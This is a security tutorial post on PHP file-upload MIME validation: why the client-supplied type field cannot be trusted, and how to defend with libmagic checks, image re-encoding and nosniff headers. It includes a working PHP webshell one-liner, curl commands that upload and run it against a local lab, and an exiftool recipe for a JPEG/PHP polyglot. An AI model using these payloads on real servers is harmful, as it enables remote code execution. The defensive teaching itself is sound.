TechEarl

File Upload MIME-Type Bypass: Why $_FILES['file']['type'] Is a Lie

Ishan Karunaratne

$_FILES['file']['type'] is one of the most consistently misunderstood values in the PHP standard library. It looks like the server inspected the upload and decided what kind of file it is. It did not. The value is a verbatim copy of a header the client posted, the client is the attacker, and the attacker can put image/jpeg in front of any bytes they like. Every variant of "we only accept images" that relies on this field is one curl flag away from RCE.

This article is the MIME-validation deep dive next to the file upload vulnerabilities guide. I cover where the value actually comes from, the realistic vulnerable pattern, a working bypass against the upload-basic lab, the correct server-side alternative using libmagic, why magic-byte sniffing on its own still loses to polyglots, and how browser MIME-sniffing turns "we stored your upload as image/jpeg" into an XSS sink. The end of the article links into the sibling pieces on extension blacklists and double extensions.

TL;DR

$_FILES['file']['type'] in PHP, and its equivalent in the other mainstream web frameworks, is the Content-Type header the client placed inside the multipart-encoded request body. The client controls every byte of it. curl -F 'file=@shell.php;type=image/jpeg' ships PHP bytes with image/jpeg declared, and any server-side check against $_FILES['file']['type'] waves it through. The correct alternative is to read the actual file bytes with libmagic or an equivalent signature sniffer (PHP's finfo, Python's python-magic, Node's file-type) and reject anything whose magic bytes do not match an allowed type. That still does not close polyglot attacks where a real JPEG carries a PHP payload in EXIF metadata, so the magic-byte check has to be paired with a forced image re-encode and with serving uploads from a directory and content-type that cannot be interpreted as code. Browser MIME-sniffing turns this from "is the file safe to store" into "is the file safe to serve", and X-Content-Type-Options: nosniff is the header that keeps the browser from guessing past the type the server declared.

Where the MIME claim comes from

The PHP manual is unusually blunt about this. The $_FILES documentation says, in the description of the type index:

The mime type of the file, if the browser provided this information. An example would be "image/gif". This mime type is however not checked on the PHP side and therefore don't take its value for granted.

The value lives inside the multipart/form-data request body. A normal upload request looks like this on the wire:

code
POST /upload.php HTTP/1.1
Host: target.example
Content-Type: multipart/form-data; boundary=----X

------X
Content-Disposition: form-data; name="file"; filename="cat.jpg"
Content-Type: image/jpeg

<<JPEG bytes>>
------X--

PHP parses that body, populates $_FILES['file'] from it, and copies the per-part Content-Type header straight into $_FILES['file']['type']. The mainstream frameworks do the same: Express multer exposes it as file.mimetype, Django as the content_type of each request.FILES entry, Rails as ActionDispatch::Http::UploadedFile#content_type, and ASP.NET as IFormFile.ContentType. The field is whatever the client put in the per-part header. None of these re-derives it from the body before exposing the field to your code.

Curl produces any value you want with the type= segment of -F:

bash
curl -F 'file=@shell.php;type=image/jpeg' http://target.example/upload.php

The file bytes are PHP. The multipart Content-Type for this part is image/jpeg. Browsers usually set the field from the OS extension map, which is why developers see image/jpeg on .jpg uploads and convince themselves the framework is doing something defensive. It is not. The browser is, and the attacker is not using a browser.
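To see how little the claim is tied to the content, here is a minimal Python sketch that parses the same kind of request body curl would send. It uses the standard library's email parser as a stand-in for a framework's multipart parser (an assumption for illustration; PHP and the frameworks above use their own parsers), and the body is hand-built rather than captured from a real request.

```python
from email import message_from_bytes

# Hand-built multipart body: PHP source declared as image/jpeg,
# equivalent to what `curl -F 'file=@shell.php;type=image/jpeg'` posts.
body = (
    b"------X\r\n"
    b'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
    b"<?php echo shell_exec($_GET['c'] ?? 'id'); ?>\r\n"
    b"------X--\r\n"
)

# The parser needs the outer request header to learn the boundary.
message = message_from_bytes(
    b"Content-Type: multipart/form-data; boundary=----X\r\n\r\n" + body
)
part = message.get_payload()[0]

claimed_type = part.get_content_type()      # copied from the per-part header
file_bytes = part.get_payload(decode=True)  # the bytes that were uploaded

print(claimed_type)    # image/jpeg
print(file_bytes[:5])  # b'<?php'
```

The parser reports image/jpeg because that is what the header says. At no point does it look at the bytes to decide.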

The realistic vulnerable pattern

Here is the validator I still see in code review in 2026:

php
if ($_FILES['file']['type'] !== 'image/jpeg') {
    die('Only JPEG allowed');
}
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

A small variant uses an allowlist of MIME strings:

php
$allowed = ['image/jpeg', 'image/png', 'image/gif'];
if (!in_array($_FILES['file']['type'], $allowed, true)) {
    die('Bad type');
}

The allowlist looks reassuring. It is not, because the value being matched is still the attacker's. An allowlist is only as good as the source of the value: an allowlist matched against a client-supplied claim is no better than a blocklist matched against the same claim. The shape of the check is right; the input to the check is wrong.

The same mistake shows up under different names: Symfony's UploadedFile::getClientMimeType(), Express multer's req.files[].mimetype, Flask's request.files['file'].mimetype. Every one of these reads the multipart per-part header, and every one of these is one line away from the bug.

Lab walkthrough: bypassing /upload-mime.php

The techearl-labs upload-basic container ships /upload-mime.php as a deliberately faithful copy of the realistic vulnerable pattern. Bring the lab up:

bash
docker compose up upload-basic

It listens on http://localhost:8083. The webshell I post is the same one-liner the file upload hub uses:

php
<?php echo shell_exec($_GET['c'] ?? 'id'); ?>

Save that as shell.php. Then ship it as image/jpeg:

bash
curl -F 'file=@shell.php;type=image/jpeg' http://localhost:8083/upload-mime.php
curl 'http://localhost:8083/uploads/mime/shell.php?c=id'

The first request returns OK. The second request returns the output of id running as the container's www-data user. Two HTTP calls, one obviously-PHP file accepted because the validator read a single attacker-supplied string and trusted it.

Run curl with -v to watch the bypass on the wire: the per-part Content-Type: image/jpeg sits immediately above the PHP source, and that is the byte string PHP places in $_FILES['file']['type']. Nothing in the actual file bytes influences the field.

The correct alternative: server-side magic-byte sniffing

The fix is to read the actual file bytes and infer the type from them. Most file types start with a fixed byte sequence (the "magic bytes"): JPEG starts with FF D8 FF, PNG with 89 50 4E 47 0D 0A 1A 0A, GIF with 47 49 46 38, PDF with 25 50 44 46. The libmagic library on Linux has a database of these signatures and is what the standard file command uses; every modern language has a binding.
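To make the prefix idea concrete, here is a minimal pure-Python sketch of a signature check covering only the four prefixes listed above. The names SIGNATURES and sniff_prefix are hypothetical, and the table is nowhere near a substitute for libmagic's database, which also handles signatures at offsets and far more formats.

```python
from typing import Optional

# Only the four signatures mentioned in the text; illustrative, not exhaustive.
SIGNATURES = {
    "image/jpeg": b"\xff\xd8\xff",
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/gif": b"GIF8",
    "application/pdf": b"%PDF",
}

def sniff_prefix(head: bytes) -> Optional[str]:
    """Return the MIME type whose signature matches the start of head, else None."""
    for mime, magic in SIGNATURES.items():
        if head.startswith(magic):
            return mime
    return None

print(sniff_prefix(b"\xff\xd8\xff\xe0\x00\x10JFIF"))   # image/jpeg
print(sniff_prefix(b"<?php echo shell_exec('id');"))  # None
```

The PHP webshell returns None no matter what Content-Type the client declared, because the declared type is never consulted.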

In PHP:

php
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($_FILES['file']['tmp_name']);

$allowed = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
if (!in_array($mime, $allowed, true)) {
    die('Bad type');
}

finfo reads from the temporary file on disk (the bytes the client actually sent) and returns a MIME string derived from libmagic's signature database. The attacker has no input into this value short of crafting a file whose body actually matches a JPEG signature. Posting a Content-Type: image/jpeg header on top of PHP bytes does not help: finfo ignores the header and reads the file.

In Python:

python
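import magic

# `uploaded` is the framework's file-like upload object; ValidationError stands in
# for whatever exception type your framework uses (Django's, for example).
head = uploaded.read(2048)
uploaded.seek(0)  # rewind so a later save writes the whole file, not the remainder
mime = magic.from_buffer(head, mime=True)
if mime not in {'image/jpeg', 'image/png', 'image/gif', 'image/webp'}:
    raise ValidationError('Bad type')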

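The python-magic package wraps the same libmagic. Its documentation recommends passing at least the first 2048 bytes, which is plenty for the image signatures in this allowlist. A few formats in the database keep their signature at a much larger offset, so do not assume a 2048-byte buffer identifies everything.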

In Node:

javascript
import { fileTypeFromBuffer } from 'file-type';

const type = await fileTypeFromBuffer(buffer);
const allowed = new Set(['image/jpeg', 'image/png', 'image/gif', 'image/webp']);
if (!type || !allowed.has(type.mime)) {
    throw new Error('Bad type');
}

file-type is the Node ecosystem's libmagic equivalent. It ships its own signature table rather than calling out to libmagic, but the principle is identical: derive the type from the bytes.

The Node mime-types package is not an equivalent: it maps file extensions and Content-Type headers to canonical MIME strings without looking at file bytes. Using it as the upload MIME check is the same bug under a different package name.

Magic bytes alone are not enough

Magic-byte sniffing closes the trivial case. It does not close polyglots, and polyglots are the bypass once a defender has read this far.

A polyglot is a file that is structurally valid as multiple formats. The simplest polyglot relevant to MIME validation is a real JPEG with PHP embedded in EXIF metadata:

bash
exiftool -Comment='<?php echo shell_exec($_GET["c"]); ?>' shell.jpg

The file's magic bytes are still FF D8 FF (JPEG SOI marker). file shell.jpg returns JPEG image data. finfo_file returns image/jpeg. python-magic returns image/jpeg. The libmagic signature database is doing the right thing: the file really is a JPEG. It is also a JPEG with <?php echo shell_exec($_GET["c"]); ?> sitting in a metadata block, and if the file ever lands in a directory the server interprets as PHP (see the double extension and AddHandler trap), or if any code path on the server does include() on it, the PHP block executes.
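The layout is easy to see in a few bytes. The sketch below builds a stub with a JPEG start-of-image marker, one comment (COM) segment holding the payload, and an end-of-image marker. It is not a decodable image, and a real polyglot would be a complete JPEG, but it shows why a prefix check has nothing to object to. The function name jpeg_comment_stub is hypothetical.

```python
def jpeg_comment_stub(payload: bytes) -> bytes:
    """SOI marker + one COM segment carrying payload + EOI marker (not a real image)."""
    # A COM segment is FF FE, then a 2-byte big-endian length that counts
    # the two length bytes themselves, then the comment data.
    segment = b"\xff\xfe" + (len(payload) + 2).to_bytes(2, "big") + payload
    return b"\xff\xd8" + segment + b"\xff\xd9"

stub = jpeg_comment_stub(b'<?php echo shell_exec($_GET["c"]); ?>')

print(stub[:3].hex(" "))  # ff d8 ff
print(b"<?php" in stub)   # True
```

The first three bytes are exactly the JPEG signature, and the PHP block sits untouched a few bytes later.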

The defence layer that beats this is to never serve the uploaded bytes as-is. There are two options. The first is to re-encode the image through a real image library (Pillow in Python, GD or Imagick in PHP, sharp in Node), which decodes the JPEG into a pixel buffer and re-encodes it as a fresh JPEG, discarding everything that is not pixel data, provided the library is not set up to copy metadata across. The second is to strip metadata explicitly with exiftool -all= before storing. The re-encode path is the stronger one because it also defends against polyglots that hide inside data blocks the metadata stripper does not know about.
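A minimal sketch of the re-encode path in Python, assuming the third-party Pillow package is installed. The function name reencode_jpeg and the max_pixels limit are hypothetical choices for illustration. The sketch pastes the decoded pixels into a brand-new image instead of saving the opened one, so the result does not depend on which metadata a given Pillow version carries across on save.

```python
import io

from PIL import Image  # assumption: Pillow is installed

def reencode_jpeg(raw: bytes, max_pixels: int = 25_000_000) -> bytes:
    """Decode an uploaded JPEG and return a fresh JPEG built from its pixels only."""
    with Image.open(io.BytesIO(raw)) as src:
        if src.format != "JPEG":
            raise ValueError("not a JPEG")
        if src.width * src.height > max_pixels:
            raise ValueError("image dimensions too large")
        # A new image starts with no comment, EXIF, or profile data;
        # paste() copies pixel data only.
        clean = Image.new("RGB", src.size)
        clean.paste(src.convert("RGB"))
    out = io.BytesIO()
    clean.save(out, format="JPEG", quality=85)
    return out.getvalue()
```

Store the returned bytes, not the original upload. The decoder is itself parsing attacker input, so the size limit and an up-to-date library matter here too.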

A short note on ImageMagick: it has its own history of RCE bugs from processing untrusted input, the canonical one being ImageTragick (CVE-2016-3714). If you pick ImageMagick as the re-encode pass, keep it patched and disable the vulnerable coders in policy.xml. The same warning applies to every image library: the re-encoder is also code parsing attacker input.

Why MIME-sniffing makes this worse

The story so far has been about preventing bad uploads. The other half of the problem is preventing bad downloads, and that half is owned by the browser.

When a browser fetches a resource, the response carries a Content-Type header set by the server. Older browsers (notably Internet Explorer, which sniffed by default and only gained the X-Content-Type-Options: nosniff opt-out in IE 8, and older Safari) treated that header as advisory: if the response body did not look like the declared type, they sniffed the first few hundred bytes and guessed a more interesting one. A response declared as image/jpeg whose body started with <html> rendered as HTML, in the application's origin, with access to session cookies. Every "I checked the MIME type" pass that did not also harden the serving path became an XSS sink.

Modern Chrome and Firefox sniff much less aggressively, but they still sniff in a handful of cases (responses without a Content-Type header, text/plain responses that look like HTML, downloads). The defence is one response header:

code
X-Content-Type-Options: nosniff

X-Content-Type-Options: nosniff tells every modern browser to treat the server's declared Content-Type as authoritative and refuse to sniff past it. It is documented on MDN's X-Content-Type-Options page. Internet Explorer 8 introduced it, other engines adopted it at different times, and every current major browser honors it. Setting it on every response from the upload-serving endpoint is the cheapest defence in the stack.

The complementary header is Content-Disposition: attachment; filename="...", which forces the browser to download the file instead of rendering it. Too aggressive for avatars or public galleries; correct for any private file (user document, support attachment, generated PDF). Combining Content-Disposition: attachment, X-Content-Type-Options: nosniff, and serving uploads from a separate isolated subdomain is the OWASP-recommended pattern for keeping the upload feature out of the XSS sink set.
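The serving-side headers can be sketched as one small helper. This is a framework-agnostic illustration, not a drop-in implementation: the function name upload_response_headers, the INLINE_SAFE set, and the choice to fall back to application/octet-stream for anything outside that set are all assumptions made for the example. stored_mime is meant to be the type the server derived from the bytes at upload time, never the client's claim.

```python
import re
from typing import Dict

# Types this hypothetical application is willing to render inline.
INLINE_SAFE = {"image/jpeg", "image/png", "image/gif", "image/webp"}

def upload_response_headers(stored_mime: str, download_name: str,
                            inline: bool = False) -> Dict[str, str]:
    """Build response headers for serving a stored upload."""
    # Keep only a conservative character set so quotes or CR/LF in a
    # user-supplied name cannot break out of the header value.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", download_name)[:100] or "download"
    render_inline = inline and stored_mime in INLINE_SAFE
    return {
        "Content-Type": stored_mime if stored_mime in INLINE_SAFE
                        else "application/octet-stream",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition":
            f'{"inline" if render_inline else "attachment"}; filename="{safe_name}"',
    }

print(upload_response_headers("image/png", "avatar.png", inline=True))
print(upload_response_headers("image/svg+xml", "logo.svg", inline=True))
```

An avatar is served inline as image/png. The SVG is forced to a download with a generic type even though the caller asked for inline, because SVG is not in the safe set.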

Real-world incidents

Two cases follow: the recurring SVG-as-active-document pattern, and one canonical CVE where the parser sitting behind a MIME check was itself the bypass. The CVE details are NVD-verified as of writing.

SVG-as-active-document, the recurring pattern

The pattern shows up in advisory after advisory: an upload endpoint accepts image/svg+xml (or accepts image/* and trusts the client-supplied Content-Type) and serves the stored SVG back from the application origin without Content-Disposition: attachment and without Content-Security-Policy, and the browser cheerfully executes the <script> inside the SVG with full access to session cookies. The bypass is the curl one-liner from this article: post a .svg payload and forge Content-Type: image/png to slip the client-MIME check. The file lands in a public directory, and the browser renders it as an active document on fetch. The fixes are the layered ones above: server-side libmagic inference, an allowlist of safe image MIMEs (SVG is not safe), and X-Content-Type-Options: nosniff plus Content-Disposition: attachment on the upload-serving endpoint.

CVE-2016-3714 (ImageTragick)

ImageMagick versions before 6.9.3-10 and 7.x before 7.0.1-1 let shell metacharacters in a crafted image reach command execution through vulnerable coders (MVG, MSL, HTTPS, and others), producing RCE on any server that ran user-uploaded images through ImageMagick. CVSS 3.1 score 8.4 HIGH. Relevant here because the re-encode pass that defends against the EXIF-PHP polyglot is itself a parser, and that parser had its own bypass. Keep ImageMagick patched, disable the vulnerable coders in policy.xml, and treat the re-encoder as untrusted-input-aware code.


Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.
